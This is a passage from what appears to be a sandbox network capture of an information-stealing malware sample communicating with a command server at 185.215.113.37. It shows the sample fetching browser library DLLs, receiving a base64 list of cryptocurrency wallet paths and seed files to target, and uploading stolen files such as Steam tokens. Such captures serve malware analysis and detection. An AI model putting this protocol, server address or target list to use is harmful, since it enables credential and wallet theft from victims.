name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file"------AKECBFBAEBKJJJJKFCGC--
Sep 27, 2024 04:14:10.882299900 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:14:11.520345926 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 04:14:11.763025999 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 27, 2024 04:14:12.582181931 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 04:14:12.805011034 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 27, 2024 04:14:13.304090023 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 04:14:13.526097059 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 27, 2024 04:14:14.144680977 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 04:14:14.366853952 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 27, 2024 04:14:15.871567011 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 04:14:16.093579054 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 27, 2024 04:14:16.287329912 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 04:14:16.509645939 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 27, 2024 04:14:17.320683956 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 04:14:18.242317915 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:14:18.508239031 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"wallets------JKECFCFBGDHIECAAFIID--
Sep 27, 2024 04:14:18.874727964 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:18 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 27, 2024 04:14:18.877620935 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJE Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="message"ybncbhylepme------FBFHDBKJEGHJJJKFIIJE--
Sep 27, 2024 04:14:19.107680082 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:18 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 30 63 0d 0a 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f [TRUNCATED] Data Ascii: 200c.pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com
Sep 27, 2024 04:14:19.391930103 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="file"------IIIEBGCBGIDHDGCAKJEB--
Sep 27, 2024 04:14:20.101437092 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:14:20.131342888 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="message"files------DHCAECGIEBKJKEBGDHDA--
Sep 27, 2024 04:14:20.356175900 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
